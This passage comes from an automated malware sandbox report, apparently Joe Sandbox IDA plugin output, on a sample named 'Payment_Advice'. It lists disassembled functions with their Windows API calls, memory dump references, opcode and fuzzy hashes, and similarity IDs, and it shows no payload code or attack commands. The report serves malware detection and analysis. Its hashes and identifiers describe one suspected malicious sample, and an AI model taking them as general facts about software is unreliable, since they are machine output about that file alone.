                                                                                                    • Instruction ID: 1e578643ef9e3c83d62c6954d9b9718dcd150b0a6fed76bbb148b8e7dd686fe4
                                                                                                    • Opcode Fuzzy Hash: f2100371eff988595885d5c3555241888cc2be14dbabbd408c9dff6c7ba1f5f8
                                                                                                    • Instruction Fuzzy Hash: D2F0A0322002269FCF158EA8FC0899A7FA9FF42B20B104124FA05F71D0EB35DE20D790
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00528E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00524286,?,0000015D,?,?,?,?,00525762,000000FF,00000000,?,?), ref: 00528E38
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: 3dd73d9eb779e3e1edc2a7e0e3a338a92b5b94fe120d06f14f7662cbe96b4f5b
                                                                                                    • Instruction ID: 4b4efa2e64a389b5ada37b393f6b3f1170fe6b1eb7d310b9183633ecca414c7c
                                                                                                    • Opcode Fuzzy Hash: 3dd73d9eb779e3e1edc2a7e0e3a338a92b5b94fe120d06f14f7662cbe96b4f5b
                                                                                                    • Instruction Fuzzy Hash: 4DE0303160723656D77126E5BC09B7B7E4CBF937A4F164111AC58962D1CF60DC0092E1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00505ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00505AC2
                                                                                                      • Part of subcall function 0050B505: __EH_prolog.LIBCMT ref: 0050B50A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: dabb70910cb47b61f7af72e336f649930a4ab81c5f9df716754e0ad5b6cc0fd1
                                                                                                    • Instruction ID: 4fc13ae89c9fead06a8529cfbd12a99912aa365e2113e5bc321b41dee3aed597
                                                                                                    • Opcode Fuzzy Hash: dabb70910cb47b61f7af72e336f649930a4ab81c5f9df716754e0ad5b6cc0fd1
                                                                                                    • Instruction Fuzzy Hash: EC018C30810691DAE725E7B8C049BDDFFE4FFA4304F50848DA45A532C2DBB81B48D7A2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00509620 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,005095D6,?,?,?,?,?,00532641,000000FF), ref: 0050963B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                    • String ID:
                                                                                                    • API String ID: 2591292051-0
                                                                                                    • Opcode ID: 0bb6fe6152b1aa888c6679bb176e12bac66fb68e1d1070e3a814b4b871081c93
                                                                                                    • Instruction ID: 70436aa41083ef2c316ba14185f0a99271d4461d0d10a6794a182f3e1a6872aa
                                                                                                    • Opcode Fuzzy Hash: 0bb6fe6152b1aa888c6679bb176e12bac66fb68e1d1070e3a814b4b871081c93
                                                                                                    • Instruction Fuzzy Hash: 0BF0E2B04C1B459FDB308A60C44CB96BBE8BB12321F040B1ED4E7429E5D372698D8A40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0050A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0050A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0050A592,000000FF,?,?), ref: 0050A6C4
                                                                                                      • Part of subcall function 0050A69B: FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0050A592,000000FF,?,?), ref: 0050A6F2
                                                                                                      • Part of subcall function 0050A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0050A592,000000FF,?,?), ref: 0050A6FE
                                                                                                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0050A598
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$FileFirst$CloseErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 1464966427-0
                                                                                                    • Opcode ID: c8e44b448aefc53c44b64f5ae2ad16318acc8394b7d08d7450452a5eb67d8093
                                                                                                    • Instruction ID: ed27f840d91adece7d2a2210f5a6024dc739d61c9bbb4f73d359ada09e89331b
                                                                                                    • Opcode Fuzzy Hash: c8e44b448aefc53c44b64f5ae2ad16318acc8394b7d08d7450452a5eb67d8093
                                                                                                    • Instruction Fuzzy Hash: 70F05E36009791AADF2257B48909BCEBFA07F6A321F048A49F1F9521D6C26550989B23
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00510E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetThreadExecutionState.KERNEL32(00000001), ref: 00510E3D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExecutionStateThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2211380416-0
                                                                                                    • Opcode ID: 769505471277bd7a61888a9f90209f453625511d9c62ff7dea1ef9c75dae0ec2
                                                                                                    • Instruction ID: 0e2a0dda48d58b2ac5cd9a0971b5697e4bbea401b46110958c1f5b9bc4543970
                                                                                                    • Opcode Fuzzy Hash: 769505471277bd7a61888a9f90209f453625511d9c62ff7dea1ef9c75dae0ec2
                                                                                                    • Instruction Fuzzy Hash: 10D0C22060506616FB213329681D7FE2E0ABFD7310F0C0065B1495B2C2CA840CC6A265
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 0051A62C
                                                                                                      • Part of subcall function 0051A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0051A3DA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                    • String ID:
                                                                                                    • API String ID: 1915507550-0
                                                                                                    • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                    • Instruction ID: 403a687f28277f607defe4311f852341e52fbb81fb16b431307e25b3579af7d3
                                                                                                    • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                    • Instruction Fuzzy Hash: D5D0A93060120ABAFF036B318C07AEE7EA9FB40340F008421BC42C5181EAB1DD90A262
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00511B3E), ref: 0051DD92
                                                                                                      • Part of subcall function 0051B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0051B579
                                                                                                      • Part of subcall function 0051B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0051B58A
                                                                                                      • Part of subcall function 0051B568: IsDialogMessageW.USER32(00010440,?), ref: 0051B59E
                                                                                                      • Part of subcall function 0051B568: TranslateMessage.USER32(?), ref: 0051B5AC
                                                                                                      • Part of subcall function 0051B568: DispatchMessageW.USER32(?), ref: 0051B5B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                    • String ID:
                                                                                                    • API String ID: 897784432-0
                                                                                                    • Opcode ID: 5b6cf01313a5ff6c2129eb93c3539d7ea0b63d0a8c1a43cb9d56a7e9e82cfc23
                                                                                                    • Instruction ID: fc7bb56dc6948f56d80a6762705b2ecd3483fbaa732d4b8bc5ff8499c4b5cd15
                                                                                                    • Opcode Fuzzy Hash: 5b6cf01313a5ff6c2129eb93c3539d7ea0b63d0a8c1a43cb9d56a7e9e82cfc23
                                                                                                    • Instruction Fuzzy Hash: E5D09E75144301BAEA012B51CD0AF5E7AA2BB99B08F004954B384740F18AB29DA5EB11
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • DloadProtectSection.DELAYIMP ref: 0051E5E3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DloadProtectSection
                                                                                                    • String ID:
                                                                                                    • API String ID: 2203082970-0
                                                                                                    • Opcode ID: 967e8b587f26a3611420714fe68d1c17318cf0146241a4ee30b4123dcff67e0b
                                                                                                    • Instruction ID: 77cb3640bf54997d79a418d728f11a0b6890e50851118f5c06baa27ccdc21815
                                                                                                    • Opcode Fuzzy Hash: 967e8b587f26a3611420714fe68d1c17318cf0146241a4ee30b4123dcff67e0b
                                                                                                    • Instruction Fuzzy Hash: B6D0C9B01C0A819AF611EBACA84BFAC7EA6B374704F980501F94592591DBA488C4E60D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005098BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetFileType.KERNELBASE(000000FF,005097BE), ref: 005098C8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileType
                                                                                                    • String ID:
                                                                                                    • API String ID: 3081899298-0
                                                                                                    • Opcode ID: e4f5cb3e3713518502864629c4b39c94280f104fb39b8fc4bc6da62083cda754
                                                                                                    • Instruction ID: 3f83ae82fa8b371c7a1891c60e3b9d55651552dcce2cbefd3292017ba03950ba
                                                                                                    • Opcode Fuzzy Hash: e4f5cb3e3713518502864629c4b39c94280f104fb39b8fc4bc6da62083cda754
                                                                                                    • Instruction Fuzzy Hash: 4EC0127440020586CE208A24984809D7B22BFA33B67B4C694D028892E6C332CC8BEA00
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051EAE7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051EAF9
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 4ecdeb4de36784aaf12df7fd7aae181055b4b5fef225ed0e460b8e7397099fbc
                                                                                                    • Instruction ID: 6e3e9deb698678a115b057248ef35bdb139d7c5a01019eadc7ea263a3f528341
                                                                                                    • Opcode Fuzzy Hash: 4ecdeb4de36784aaf12df7fd7aae181055b4b5fef225ed0e460b8e7397099fbc
                                                                                                    • Instruction Fuzzy Hash: 1BB012C629A0437C3204A2041D0FC7B0E4CF8C1FA0730C42EFC00D4081DC811C870431
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E3FC
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 91959be5000ddc508665b379a0595ab0ad89ad004055d68f9d65c883b0b5ad3f
                                                                                                    • Instruction ID: 1fd7e4c1077742809964f39fdd1740c285bf493bbf45ff8566bc905dc8529a3f
                                                                                                    • Opcode Fuzzy Hash: 91959be5000ddc508665b379a0595ab0ad89ad004055d68f9d65c883b0b5ad3f
                                                                                                    • Instruction Fuzzy Hash: 2CB012E125C011FC320491085D0BC770F4CF5C0B30330C82EFC14D2080D8405C8A0533
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E3FC
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 2a477607aa08043b6c7fba702584e909a2ece5f027a9560e45efa0ce33259840
                                                                                                    • Instruction ID: 4acc5d5e1d7db53e01a965bda49c0e46eac4b1730f969caa8da5ddd8e82a5c35
                                                                                                    • Opcode Fuzzy Hash: 2a477607aa08043b6c7fba702584e909a2ece5f027a9560e45efa0ce33259840
                                                                                                    • Instruction Fuzzy Hash: F1B012E125C011BC320451085E0BCB70F4CF5C0B30330C82EFD14D2080D8401C8F0533
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E3FC
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 5651896f9ffe947bfd2a10299060524116d511675e0b7207cdd5d3e74255e960
                                                                                                    • Instruction ID: ea569c846ba704205eb659e67d0307ecbd827007464c7faed8d1e0344c6aee85
                                                                                                    • Opcode Fuzzy Hash: 5651896f9ffe947bfd2a10299060524116d511675e0b7207cdd5d3e74255e960
                                                                                                    • Instruction Fuzzy Hash: E5B012F125C011FC320491081C0BC770F4CF6C0F20330892EFC14D2081D8445E8A0533
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E3FC
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 94d23d8662282435525989383b7baa24a6bf167c78f2130f2a7005a25aeaabfd
